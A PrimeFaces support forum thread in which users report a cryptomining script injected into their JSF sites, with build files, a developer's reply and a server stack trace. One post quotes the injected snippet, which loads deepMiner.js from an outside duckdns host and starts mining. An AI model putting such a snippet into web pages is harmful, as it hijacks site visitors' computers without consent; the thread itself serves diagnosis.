URGENT: Mining-script in Primfaces-Page? Where does it come from??

UI Components for JSF
tandraschko
PrimeFaces Core Developer
Posts: 3979
Joined: 03 Dec 2010, 14:11
Location: Bavaria, DE
Contact:

13 Jan 2018, 16:56

I'm running PrimeFaces apps since years without any similar problems.
If you think it's PrimeFaces related, we need some evidence or further analysis.
Nobody can help with this informations. Debug and post more infos who and how the script is added.

Also, 5.3 is already quite old... Use 6.2RC1 to get the latest fixes.
Thomas Andraschko

PrimeFaces | PrimeFaces Extensions

Apache Member | OpenWebBeans, DeltaSpike, MyFaces, BVal, TomEE

Sponsor me: https://github.com/sponsors/tandraschko
Blog: http://tandraschko.blogspot.de/
Twitter: https://twitter.com/TAndraschko

danielkohl
Posts: 33
Joined: 02 Apr 2012, 15:24

13 Jan 2018, 19:09

tandraschko wrote:
13 Jan 2018, 16:56
I'm running PrimeFaces apps since years without any similar problems.
It doesn't change the behavior of the site, it only has influence on the CPU-load.
Nevertheless...as you can see, i'm not the only one with this problem.
Perhaps i am the first one who detected this embedded scripts.
tandraschko wrote:
13 Jan 2018, 16:56
If you think it's PrimeFaces related, we need some evidence or further analysis.
The "infected" sites are all build with Primefaces. Search for the script posted before.
I am not the only one. There seems to be a relation to Primefaces.
tandraschko wrote:
13 Jan 2018, 16:56
Nobody can help with this informations. Debug and post more infos who and how the script is added.
That's why i posted this issue. At this time i can only report that there's the possibility to embed scripts in Primefaces related sites (on server-side, no clients involved).

tandraschko wrote:
13 Jan 2018, 16:56
Also, 5.3 is already quite old... Use 6.2RC1 to get the latest fixes.
The site is quite big and runs really fine with 5.3.

User avatar
452
Posts: 16
Joined: 30 Sep 2011, 14:57
Location: Ukraine
Contact:

14 Jan 2018, 07:31

I also have this vulnerability/mining script on my site
after docker container restart - script is gone from pages and returns again after several hours
Used docker container jboss/wildfly:11.0.0.Final from docker hub, official repository
I provide primefaces-5.2.jar as module for WildFly, you can download for analyze from here

COPY docker/wildfly/modules $JBOSS_MODULEPATH

Docker

Code: Select all

FROM jboss/wildfly:11.0.0.Final
MAINTAINER Ukraine <sp452@i.ua>

ENV JBOSS_MODULEPATH=/opt/jboss/wildfly/modules

COPY docker/wildfly/modules $JBOSS_MODULEPATH
COPY docker/wildfly/standalone.xml /opt/jboss/wildfly/standalone/configuration/standalone.xml
COPY deployments/spring-api.war /opt/jboss/wildfly/standalone/deployments
COPY deployments/ROOT.war /opt/jboss/wildfly/standalone/deployments

ADD docker/run.sh /usr/local/bin/wildfly
CMD ["/usr/local/bin/wildfly"]
pom.xml

Code: Select all

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<groupId>com.zinrad.rs</groupId>
	<artifactId>rs</artifactId>
	<version>0.0.1</version>
	<packaging>pom</packaging>
	<name>RS - zinrad.com</name>
	<description>zinrad.com</description>

	<parent>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-parent</artifactId>
		<version>1.5.9.RELEASE</version>
	</parent>

	<properties>
		<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
		<maven.war.plugin>3.2.0</maven.war.plugin>
		<maven.compiler.target>1.8</maven.compiler.target>
		<maven.compiler.source>1.8</maven.compiler.source>
		<maven.compiler.version>3.7.0</maven.compiler.version>
		<maven.surefire.version>2.20.1</maven.surefire.version>
		<maven.release.version>2.5.3</maven.release.version>
		<version.jboss.bom>8.2.2.Final</version.jboss.bom>
		<version.jboss.spec.javaee.7.0>1.0.0.Final</version.jboss.spec.javaee.7.0>
		<org.primefaces-version>5.2</org.primefaces-version>
		<org.primefaces.themes-version>1.0.10</org.primefaces.themes-version>
		<org.apache.camel.version>2.18.2</org.apache.camel.version>
	</properties>

	<modules>
		<module>rs-app</module>
		<!-- <module>rs-nomenclature</module> -->
		<!-- <module>rs-shop</module> -->
		<module>spring-api</module>
	</modules>

	<profiles>
		<profile>
			<id>default</id>
			<activation>
				<activeByDefault>true</activeByDefault>
			</activation>
			<build>
				<plugins>
					<plugin>
						<artifactId>maven-surefire-plugin</artifactId>
						<configuration>
							<skip>true</skip>
						</configuration>
					</plugin>
				</plugins>
			</build>
		</profile>
	</profiles>

	<build>
		<pluginManagement>
			<plugins>
				<plugin>
					<groupId>org.owasp</groupId>
					<artifactId>dependency-check-maven</artifactId>
					<version>3.1.0</version>
					<executions>
						<execution>
							<goals>
								<goal>check</goal>
							</goals>
						</execution>
					</executions>
				</plugin>
				<plugin>
					<artifactId>maven-compiler-plugin</artifactId>
					<version>${maven.compiler.version}</version>
					<configuration>
						<source>${maven.compiler.source}</source>
						<target>${maven.compiler.target}</target>
						<encoding>${project.build.sourceEncoding}</encoding>
					</configuration>
				</plugin>
				<plugin>
					<artifactId>maven-war-plugin</artifactId>
					<version>${maven.war.plugin}</version>
					<configuration>
						<warName>${project.artifactId}</warName>
						<failOnMissingWebXml>false</failOnMissingWebXml>
						<outputDirectory>deployments</outputDirectory>
						<archive>
							<addMavenDescriptor>false</addMavenDescriptor>
							<manifestEntries>
								<Build-Time>${maven.build.timestamp}</Build-Time>
								<Dependencies>org.infinispan export, org.hibernate export</Dependencies>
							</manifestEntries>
						</archive>
					</configuration>
				</plugin>
				<plugin>
					<groupId>org.apache.maven.plugins</groupId>
					<artifactId>maven-javadoc-plugin</artifactId>
					<version>3.0.0</version>
					<configuration>
						<show>private</show>
						<nohelp>true</nohelp>
					</configuration>
				</plugin>
				<plugin>
					<groupId>org.apache.maven.plugins</groupId>
					<artifactId>maven-surefire-plugin</artifactId>
					<version>${maven.surefire.version}</version>
					<configuration>
						<parallel>methods</parallel>
						<threadCount>10</threadCount>
						<systemPropertyVariables>
							<arquillian.launch>arquillian-wildfly-remote</arquillian.launch>
						</systemPropertyVariables>
					</configuration>
				</plugin>
				<plugin>
					<artifactId>maven-release-plugin</artifactId>
					<version>${maven.release.version}</version>
					<configuration>
						<pushChanges>false</pushChanges>
						<localCheckout>true</localCheckout>
					</configuration>
				</plugin>
			</plugins>
		</pluginManagement>
	</build>

	<dependencyManagement>
		<dependencies>
			<dependency>
				<groupId>org.wildfly.bom</groupId>
				<artifactId>jboss-javaee-7.0-with-hibernate</artifactId>
				<version>${version.jboss.bom}</version>
				<type>pom</type>
				<scope>import</scope>
			</dependency>
			<!-- Apache Camel -->
			<dependency>
				<groupId>org.apache.camel</groupId>
				<artifactId>camel-core</artifactId>
				<version>${org.apache.camel.version}</version>
				<scope>provided</scope>
				<type>jar</type>
			</dependency>
			<dependency>
				<groupId>org.apache.camel</groupId>
				<artifactId>camel-blueprint</artifactId>
				<version>${org.apache.camel.version}</version>
				<scope>provided</scope>
			</dependency>
			<dependency>
				<groupId>org.apache.camel</groupId>
				<artifactId>camel-stream</artifactId>
				<version>${org.apache.camel.version}</version>
				<scope>provided</scope>
			</dependency>
			<dependency>
				<groupId>org.apache.camel</groupId>
				<artifactId>camel-cdi</artifactId>
				<version>${org.apache.camel.version}</version>
				<scope>provided</scope>
			</dependency>
			<dependency>
				<groupId>org.apache.camel</groupId>
				<artifactId>camel-servlet</artifactId>
				<version>${org.apache.camel.version}</version>
				<scope>provided</scope>
			</dependency>
			<!-- blueprint web -->
			<dependency>
				<groupId>org.apache.aries.blueprint</groupId>
				<artifactId>org.apache.aries.blueprint.web</artifactId>
				<version>1.0.0</version>
				<scope>provided</scope>
			</dependency>
			<dependency>
				<groupId>junit</groupId>
				<artifactId>junit</artifactId>
				<version>4.12</version>
				<scope>test</scope>
			</dependency>
		</dependencies>
	</dependencyManagement>

	<repositories>
		<repository>
			<id>central</id>
			<url>https://repo1.maven.org/maven2</url>
			<releases>
				<enabled>true</enabled>
			</releases>
		</repository>
		<repository>
			<id>jboss-public-repository-group</id>
			<name>JBoss Public Repository Group</name>
			<url>https://repository.jboss.org/nexus/content/groups/public</url>
		</repository>
		<repository>
			<id>prime-repo</id>
			<name>PrimeFaces Maven Repository</name>
			<url>https://repository.primefaces.org</url>
			<layout>default</layout>
			<releases>
				<enabled>true</enabled>
			</releases>
			<snapshots>
				<enabled>false</enabled>
			</snapshots>
		</repository>
		<repository>
			<id>google-api-services</id>
			<url>https://oss.sonatype.org/content/repositories/releases/</url>
		</repository>
		<repository>
			<id>burtsev-net-maven</id>
			<name>Burtsev.Net Maven Repository</name>
			<url>http://maven.burtsev.net</url>
		</repository>
	</repositories>
</project>

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
	<modelVersion>4.0.0</modelVersion>

	<groupId>emetemunoy</groupId>
	<artifactId>rs-app</artifactId>
	<version>0.1.15</version>
	<packaging>war</packaging>
	<name>Zinrad legacy app</name>
	<description>zinrad.com</description>
	<parent>
		<groupId>com.zinrad.rs</groupId>
		<artifactId>rs</artifactId>
		<version>0.0.1</version>
	</parent>
	<properties>
		<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
		<maven.compiler.source>1.8</maven.compiler.source>
		<maven.compiler.target>1.8</maven.compiler.target>
		<version.jboss.spec.javaee.7.0>1.1.0.Final</version.jboss.spec.javaee.7.0>
		<org.ocpsoft.rewrite>2.0.7.Final</org.ocpsoft.rewrite>
		<mysql-connector-version>5.1.34</mysql-connector-version>
		<javax.faces-version>2.2.0</javax.faces-version>
		<org.apache.poi.version>3.12</org.apache.poi.version>
		<org.primefaces-version>5.2</org.primefaces-version>
		<org.primefaces.themes-version>1.0.10</org.primefaces.themes-version>
		<org.springframework.version>4.2.0.RELEASE</org.springframework.version>
		<org.springsecurity-version>3.2.8.RELEASE</org.springsecurity-version>
		<!-- <org.springsecurity-version>4.0.2.RELEASE</org.springsecurity-version> -->
		<org.springframework.webflow>2.4.0.RELEASE</org.springframework.webflow>
		<com.h2database-version>1.4.191</com.h2database-version>
		<infinispan.version>5.1.4.FINAL</infinispan.version>
		<org.slf4j-version>1.7.12</org.slf4j-version>
		<com.itextpdf-version>5.5.4</com.itextpdf-version>
		<com.itextpdf.tool-version>5.5.4</com.itextpdf.tool-version>
		<cglib-version>3.0</cglib-version>
		<jboss.bom.version>1.0.7.Final</jboss.bom.version>
		<version.io.swagger>1.5.17</version.io.swagger>
		<version.arquillian.spring>1.0.0.Beta2</version.arquillian.spring>
		<version.arquillian.transaction>1.0.0.Final-SNAPSHOT</version.arquillian.transaction>
	</properties>

	<dependencyManagement>
		<dependencies>
			<dependency>
				<groupId>org.jboss.spec</groupId>
				<artifactId>jboss-javaee-7.0</artifactId>
				<version>${version.jboss.spec.javaee.7.0}</version>
				<type>pom</type>
				<scope>import</scope>
			</dependency>
			<dependency>
				<groupId>org.jboss.bom</groupId>
				<artifactId>jboss-javaee-6.0-with-hibernate</artifactId>
				<version>${jboss.bom.version}</version>
				<type>pom</type>
				<scope>import</scope>
			</dependency>
			<dependency>
				<groupId>org.jboss.bom</groupId>
				<artifactId>jboss-javaee-6.0-with-transactions</artifactId>
				<version>${jboss.bom.version}</version>
				<type>pom</type>
				<scope>import</scope>
			</dependency>
		</dependencies>
	</dependencyManagement>

	<dependencies>
		<dependency>
			<groupId>javax</groupId>
			<artifactId>javaee-api</artifactId>
			<version>7.0</version>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>com.h2database</groupId>
			<artifactId>h2</artifactId>
<!-- 			<version>${com.h2database-version}</version> -->
		</dependency>
		<dependency>
			<groupId>joda-time</groupId>
			<artifactId>joda-time</artifactId>
<!-- 			<version>2.3</version> -->
		</dependency>
		<dependency>
			<groupId>org.apache.poi</groupId>
			<artifactId>poi</artifactId>
			<version>${org.apache.poi.version}</version>
		</dependency>
		<dependency>
			<groupId>org.apache.poi</groupId>
			<artifactId>poi-ooxml</artifactId>
			<version>${org.apache.poi.version}</version>
			<exclusions>
				<exclusion>
					<artifactId>dom4j</artifactId>
					<groupId>dom4j</groupId>
				</exclusion>
			</exclusions>
		</dependency>
		<dependency>
			<groupId>org.apache.poi</groupId>
			<artifactId>poi-ooxml-schemas</artifactId>
			<version>${org.apache.poi.version}</version>
		</dependency>
		<!-- Google -->
		<!-- gdata -->
		<dependency>
			<groupId>com.google.gdata.gdata-java-client</groupId>
			<artifactId>gdata-photos-2.0</artifactId>
			<version>1.47.1</version>
		</dependency>
		<dependency>
			<groupId>com.google.gdata.gdata-java-client</groupId>
			<artifactId>gdata-appsforyourdomain-1.0</artifactId>
			<version>1.47.1</version>
		</dependency>
		<dependency>
			<groupId>com.google.api-client</groupId>
			<artifactId>google-api-client</artifactId>
			<version>1.22.0</version>
			<type>jar</type>
		</dependency>
		<dependency>
			<groupId>com.google.http-client</groupId>
			<artifactId>google-http-client-jackson</artifactId>
			<version>1.22.0</version>
			<type>jar</type>
		</dependency>
		<dependency>
			<groupId>javax.transaction</groupId>
			<artifactId>jta</artifactId>
			<version>1.1</version>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>commons-io</groupId>
			<artifactId>commons-io</artifactId>
			<version>2.4</version>
			<scope>provided</scope>
		</dependency>
		<!-- <dependency> -->
		<!-- <groupId>commons-fileupload</groupId> -->
		<!-- <artifactId>commons-fileupload</artifactId> -->
		<!-- <version>1.3.1</version> -->
		<!-- <scope>provided</scope> -->
		<!-- </dependency> -->
		<dependency>
			<groupId>javax.mail</groupId>
			<artifactId>mail</artifactId>
			<scope>provided</scope>
		</dependency>
		<!-- First declare the APIs we depend on and need for compilation. All 
			of them are provided by JBoss AS 7 -->

		<!-- Import the CDI API, we use provided scope as the API is included in 
			JBoss AS 7 -->
		<dependency>
			<groupId>javax.enterprise</groupId>
			<artifactId>cdi-api</artifactId>
			<scope>provided</scope>
		</dependency>
		<!-- Import the Common Annotations API (JSR-250), we use provided scope 
			as the API is included in JBoss AS 7 -->
		<dependency>
			<groupId>org.jboss.spec.javax.annotation</groupId>
			<artifactId>jboss-annotations-api_1.2_spec</artifactId>
			<scope>provided</scope>
		</dependency>

		<!-- Import the JAX-RS API, we use provided scope as the API is included 
			in JBoss AS 7 -->
		<dependency>
			<groupId>org.jboss.spec.javax.ws.rs</groupId>
			<artifactId>jboss-jaxrs-api_2.0_spec</artifactId>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>io.swagger</groupId>
			<artifactId>swagger-jaxrs</artifactId>
			<version>${version.io.swagger}</version>
		</dependency>
		<!-- Import the JPA API, we use provided scope as the API is included in 
			JBoss AS 7 -->
		<dependency>
			<groupId>org.hibernate.javax.persistence</groupId>
			<artifactId>hibernate-jpa-2.1-api</artifactId>
			<scope>provided</scope>
		</dependency>

		<!-- Import the EJB API, we use provided scope as the API is included in 
			JBoss AS 7 -->
		<dependency>
			<groupId>org.jboss.spec.javax.ejb</groupId>
			<artifactId>jboss-ejb-api_3.1_spec</artifactId>
			<scope>provided</scope>
		</dependency>

		<!-- Now we declare any tools needed -->

		<!-- Annotation processor to generate the JPA 2.0 metamodel classes for 
			typesafe criteria queries -->
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-jpamodelgen</artifactId>
			<scope>provided</scope>
		</dependency>
		<!-- JSR-303 (Bean Validation) Implementation -->
		<!-- Provides portable constraints such as @Email -->
		<!-- Annotation processor that raising compilation errors whenever constraint 
			annotations are incorrectly used. -->
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-validator-annotation-processor</artifactId>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-core</artifactId>
			<scope>provided</scope>
			<!-- <version>${org.hibernate.version}</version> -->
			<exclusions>
				<exclusion>
					<artifactId>xml-apis</artifactId>
					<groupId>xml-apis</groupId>
				</exclusion>
				<exclusion>
					<artifactId>antlr</artifactId>
					<groupId>antlr</groupId>
				</exclusion>
				<exclusion>
					<artifactId>jboss-logging</artifactId>
					<groupId>org.jboss.logging</groupId>
				</exclusion>
				<exclusion>
					<artifactId>dom4j</artifactId>
					<groupId>dom4j</groupId>
				</exclusion>
			</exclusions>
		</dependency>
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-annotations</artifactId>
			<version>3.5.6-Final</version>
		</dependency>
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-infinispan</artifactId>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-jbosscache</artifactId>
			<version>3.6.10.Final</version>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.hibernate</groupId>
			<artifactId>hibernate-entitymanager</artifactId>
			<scope>provided</scope>
			<exclusions>
				<exclusion>
					<artifactId>jboss-logging</artifactId>
					<groupId>org.jboss.logging</groupId>
				</exclusion>
				<exclusion>
					<artifactId>dom4j</artifactId>
					<groupId>dom4j</groupId>
				</exclusion>
			</exclusions>
		</dependency>
		<!-- Optional, but highly recommended -->
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-web</artifactId>
			<exclusions>
				<exclusion>
					<groupId>org.springframework.boot</groupId>
					<artifactId>spring-boot-starter-tomcat</artifactId>
				</exclusion>
			</exclusions>
		</dependency>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-data-jpa</artifactId>
		</dependency>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-jdbc</artifactId>
		</dependency>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-security</artifactId>
		</dependency>
		<dependency>
			<groupId>org.springframework.security</groupId>
			<artifactId>spring-security-taglibs</artifactId>
		</dependency>
		<dependency>
		    <groupId>org.springframework.webflow</groupId>
		    <artifactId>spring-faces</artifactId>
		    <version>2.4.7.RELEASE</version>
		</dependency>
		<dependency>
			<groupId>org.slf4j</groupId>
			<artifactId>slf4j-api</artifactId>
			<scope>compile</scope>
<!-- 			<version>${org.slf4j-version}</version> -->
		</dependency>
		<dependency>
			<groupId>org.slf4j</groupId>
			<artifactId>jcl-over-slf4j</artifactId>
			<scope>compile</scope>
<!-- 			<version>${org.slf4j-version}</version> -->
		</dependency>
		<dependency>
			<groupId>org.slf4j</groupId>
			<artifactId>slf4j-log4j12</artifactId>
			<scope>compile</scope>
<!-- 			<version>${org.slf4j-version}</version> -->
		</dependency>
		<dependency>
			<groupId>mysql</groupId>
			<artifactId>mysql-connector-java</artifactId>
<!-- 			<version>${mysql-connector-version}</version> -->
		</dependency>

		<!-- Import the JSF API, we use provided scope as the API is included in 
			JBoss AS 7 -->
		<!-- Import the JSF & JSP API -->
		<dependency>
			<groupId>org.jboss.spec.javax.servlet</groupId>
			<artifactId>jboss-servlet-api_3.1_spec</artifactId>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.jboss.spec.javax.faces</groupId>
			<artifactId>jboss-jsf-api_2.2_spec</artifactId>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.primefaces</groupId>
			<artifactId>primefaces</artifactId>
			<version>${org.primefaces-version}</version>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.primefaces.themes</groupId>
			<artifactId>all-themes</artifactId>
			<version>${org.primefaces.themes-version}</version>
			<scope>provided</scope>
		</dependency>
		<dependency>
			<groupId>org.ocpsoft.rewrite</groupId>
			<artifactId>rewrite-servlet</artifactId>
			<version>${org.ocpsoft.rewrite}</version>
		</dependency>
		<dependency>
			<groupId>org.ocpsoft.rewrite</groupId>
			<artifactId>rewrite-config-prettyfaces</artifactId>
			<version>${org.ocpsoft.rewrite}</version>
		</dependency>
		<dependency>
			<groupId>org.ocpsoft.rewrite</groupId>
			<artifactId>rewrite-integration-faces</artifactId>
			<version>${org.ocpsoft.rewrite}</version>
		</dependency>
		<dependency>
			<groupId>org.ocpsoft.rewrite</groupId>
			<artifactId>rewrite-integration-spring</artifactId>
			<version>${org.ocpsoft.rewrite}</version>
		</dependency>
		<!-- Reports -->
		<dependency>
			<groupId>net.sf.jasperreports</groupId>
			<artifactId>jasperreports</artifactId>
			<version>5.5.0</version>
		</dependency>
		<dependency>
			<groupId>net.sf.jasperreports</groupId>
			<artifactId>jasperreports-fonts</artifactId>
			<version>4.0.0</version>
		</dependency>
		<dependency>
			<groupId>com.itextpdf</groupId>
			<artifactId>itextpdf</artifactId>
			<version>${com.itextpdf-version}</version>
			<type>jar</type>
		</dependency>
		<dependency>
			<groupId>com.itextpdf.tool</groupId>
			<artifactId>xmlworker</artifactId>
			<version>${com.itextpdf.tool-version}</version>
			<type>jar</type>
		</dependency>
		<dependency>
			<groupId>junit</groupId>
			<artifactId>junit</artifactId>
			<scope>test</scope>
		</dependency>
		<!-- End -->
	</dependencies>
	<prerequisites>
		<maven>3.0.4</maven>
	</prerequisites>
	<build>
		<!-- Maven will append the version to the finalName (which is the name 
			given to the generated war, and hence the context root) -->
		<finalName>${project.artifactId}</finalName>
		<resources>
			<resource>
				<directory>src/main/resources</directory>
				<filtering>false</filtering>
			</resource>
		</resources>
		<plugins>
			<plugin>
				<artifactId>maven-compiler-plugin</artifactId>
				<configuration>
					<source>${maven.compiler.source}</source>
					<target>${maven.compiler.target}</target>
					<encoding>${project.build.sourceEncoding}</encoding>
				</configuration>
			</plugin>
			<plugin>
				<artifactId>maven-war-plugin</artifactId>
				<configuration>
					<!-- Java EE 6 doesn't require web.xml, Maven needs to catch up! -->
					<outputDirectory>deployments</outputDirectory>
					<warName>ROOT</warName>
					<failOnMissingWebXml>false</failOnMissingWebXml>
					<archive>
						<manifestEntries>
							<Dependencies>org.infinispan export, org.hibernate export</Dependencies>
						</manifestEntries>
					</archive>
				</configuration>
			</plugin>
			<!-- The JBoss AS plugin deploys your war to a local JBoss AS container -->
			<!-- To use, run: mvn package jboss-as:deploy -->
			<plugin>
				<artifactId>maven-surefire-plugin</artifactId>
			</plugin>
			<plugin>
				<groupId>org.wildfly.plugins</groupId>
				<artifactId>wildfly-maven-plugin</artifactId>
				<version>1.2.1.Final</version>
			</plugin>
		</plugins>
	</build>
	<reporting>
		<plugins>
			<plugin>
				<groupId>org.codehaus.mojo</groupId>
				<artifactId>versions-maven-plugin</artifactId>
				<version>2.1</version>
				<reportSets>
					<reportSet>
						<reports>
							<report>dependency-updates-report</report>
							<report>plugin-updates-report</report>
							<report>property-updates-report</report>
						</reports>
					</reportSet>
				</reportSets>
			</plugin>
		</plugins>
	</reporting>
	<profiles>
		<profile>
			<id>default</id>
			<activation>
				<activeByDefault>true</activeByDefault>
			</activation>
			<build>
				<plugins>
					<plugin>
						<artifactId>maven-surefire-plugin</artifactId>
						<configuration>
							<skip>true</skip>
						</configuration>
					</plugin>
				</plugins>
			</build>
		</profile>

		<profile>
			<!-- When built in OpenShift the 'openshift' profile will be used when 
				invoking mvn. -->
			<!-- Use this profile for any OpenShift specific customization your app 
				will need. -->
			<!-- By default that is to put the resulting archive into the 'deployments' 
				folder. -->
			<!-- http://maven.apache.org/guides/mini/guide-building-for-different-environments.html -->
			<id>openshift</id>
			<build>
				<plugins>
					<plugin>
						<artifactId>maven-war-plugin</artifactId>
						<version>3.2.0</version>
						<configuration>
							<outputDirectory>deployments</outputDirectory>
							<warName>ROOT</warName>
							<archive>
								<manifestEntries>
									<Dependencies>org.infinispan export</Dependencies>
								</manifestEntries>
							</archive>
						</configuration>
					</plugin>
				</plugins>
			</build>
		</profile>

	</profiles>
</project>
like PrimeFaces
Java

Melloware
Posts: 3716
Joined: 22 Apr 2013, 15:48

15 Jan 2018, 14:53

Yeah I agree but I think somehow someone hacked your machine to add this bitcoin miner to it. I am not sure how they got in or how they were able to install a script on you outgoing responses.

https://github.com/deepwn/deepMiner

I am fascinated please keep us up to date if you figure out how they did it?
PrimeFaces Developer | PrimeFaces Extensions Developer
GitHub Profile: https://github.com/melloware
PrimeFaces Elite 13.0.0 / PF Extensions 13.0.0
PrimeReact 9.6.1

Melloware
Posts: 3716
Joined: 22 Apr 2013, 15:48

15 Jan 2018, 14:57

PrimeFaces Developer | PrimeFaces Extensions Developer
GitHub Profile: https://github.com/melloware
PrimeFaces Elite 13.0.0 / PF Extensions 13.0.0
PrimeReact 9.6.1

kukeltje
Expert Member
Posts: 9605
Joined: 17 Jun 2010, 13:34
Location: Netherlands

15 Jan 2018, 21:59


tak3shi
Posts: 6
Joined: 25 Apr 2013, 22:58

15 Jan 2018, 23:12

I have got the same issue today in two different Domains on the same server. One of the Domains is using Primefaces 5.2 on Payara:

This has been injected to all pages (I have changed the code in Anonymous function.

Code: Select all

<script src="https://jhondi33.duckdns.org:7777/deepMiner.js"></script><script>var miner = new deepMiner.Anonymous("5553x393mfdsfs");miner.start();</script> </title><script type="text/javascript" src="/javax.faces.resource/app.min.js.xhtml?ln=js"></script>
I have found following in the Logfile where Primefaces 5.2 is running:

Code: Select all

java.io.IOException: javax.el.ELException: java.lang.IllegalArgumentException: Cannot convert 

 of type class java.lang.String to interface org.primefaces.model.StreamedContent
	at org.primefaces.application.resource.StreamedContentHandler.handle(StreamedContentHandler.java:94)
	at org.primefaces.application.resource.PrimeResourceHandler.handleResourceRequest(PrimeResourceHandler.java:72)
	at javax.faces.application.ResourceHandlerWrapper.handleResourceRequest(ResourceHandlerWrapper.java:153)
	at javax.faces.application.ResourceHandlerWrapper.handleResourceRequest(ResourceHandlerWrapper.java:153)
	at javax.faces.webapp.FacesServlet.service(FacesServlet.java:655)
	at org.apache.catalina.core.StandardWrapper.service(StandardWrapper.java:1606)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:338)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
	at org.ocpsoft.rewrite.servlet.RewriteFilter.doFilter(RewriteFilter.java:205)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:250)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
	at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:176)
	at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:145)
	at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:92)
	at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:389)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:250)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:256)
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:160)
	at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:654)
	at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:593)
	at com.sun.enterprise.web.WebPipeline.invoke(WebPipeline.java:99)
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:155)
	at org.apache.catalina.connector.CoyoteAdapter.doService(CoyoteAdapter.java:371)
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:238)
	at com.sun.enterprise.v3.services.impl.ContainerMapper$HttpHandlerCallable.call(ContainerMapper.java:466)
	at com.sun.enterprise.v3.services.impl.ContainerMapper.service(ContainerMapper.java:169)
	at org.glassfish.grizzly.http.server.HttpHandler.runService(HttpHandler.java:206)
	at org.glassfish.grizzly.http.server.HttpHandler.doHandle(HttpHandler.java:180)
	at org.glassfish.grizzly.http.server.HttpServerFilter.handleRead(HttpServerFilter.java:235)
	at org.glassfish.grizzly.filterchain.ExecutorResolver$9.execute(ExecutorResolver.java:119)
	at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeFilter(DefaultFilterChain.java:284)
	at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeChainPart(DefaultFilterChain.java:201)
	at org.glassfish.grizzly.filterchain.DefaultFilterChain.execute(DefaultFilterChain.java:133)
	at org.glassfish.grizzly.filterchain.DefaultFilterChain.process(DefaultFilterChain.java:112)
	at org.glassfish.grizzly.ProcessorExecutor.execute(ProcessorExecutor.java:77)
	at org.glassfish.grizzly.nio.transport.TCPNIOTransport.fireIOEvent(TCPNIOTransport.java:539)
	at org.glassfish.grizzly.strategies.AbstractIOStrategy.fireIOEvent(AbstractIOStrategy.java:112)
	at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.run0(WorkerThreadIOStrategy.java:117)
	at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.access$100(WorkerThreadIOStrategy.java:56)
	at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy$WorkerThreadRunnable.run(WorkerThreadIOStrategy.java:137)
	at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.doWork(AbstractThreadPool.java:593)
	at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.run(AbstractThreadPool.java:573)
	at java.lang.Thread.run(Thread.java:748)
Caused by: javax.el.ELException: java.lang.IllegalArgumentException: Cannot convert 

 of type class java.lang.String to interface org.primefaces.model.StreamedContent
	at com.sun.el.ExpressionFactoryImpl.coerceToType(ExpressionFactoryImpl.java:87)
	at org.jboss.weld.util.el.ForwardingExpressionFactory.coerceToType(ForwardingExpressionFactory.java:38)
	at javax.el.ELContext.convertToType(ELContext.java:478)
	at com.sun.el.lang.EvaluationContext.convertToType(EvaluationContext.java:166)
	at com.sun.el.ValueExpressionImpl.getValue(ValueExpressionImpl.java:229)
	at org.jboss.weld.el.WeldValueExpression.getValue(WeldValueExpression.java:50)
